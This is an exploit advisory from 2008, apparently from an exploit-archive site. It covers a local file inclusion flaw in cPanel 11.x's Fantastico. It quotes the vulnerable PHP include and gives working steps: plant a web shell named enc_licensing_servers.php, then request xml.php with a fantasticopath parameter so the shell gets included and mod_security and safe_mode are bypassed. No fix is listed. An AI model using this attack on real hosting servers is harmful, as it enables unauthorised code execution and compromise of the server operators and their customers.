Cpanel <= 11.x (Fantastico) LFI Vulnerability (sec bypass)

2008-09-14 00:01:05

##############################################################
Fantastico In all Version Cpanel 11.x <= local File Include

##############################################################


Must login to :2082
To break the protection mod_security & safe_mode: off & Disable functions : all none



Vulnerable Code

$licensing_servers=$fantasticopath . "/includes/enc_licensing_servers.php";
if (is_file($licensing_servers))
{
include($licensing_servers);


in

http://xx.com:2082/frontend/x/fantastico/includes/xml.php


Exploit >>

First Create directory Let the name /includes/ and upload Shell.php in /includes/ Then rename it to enc_licensing_servers.php


:::xploit::::

http://xxx.com:2082/frontend/x/fantastico/includes/xml.php?fantasticopath=/home/user



###################################################

Discoverd By : joker_1



for info : [email protected]



###################################################

Special Greetings :- sniper-sa.com & Group XP & Alm3reFh.Com & Genral kbkb & step on the snow & red trigger & qalbhamad & saudi star

###################################################

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.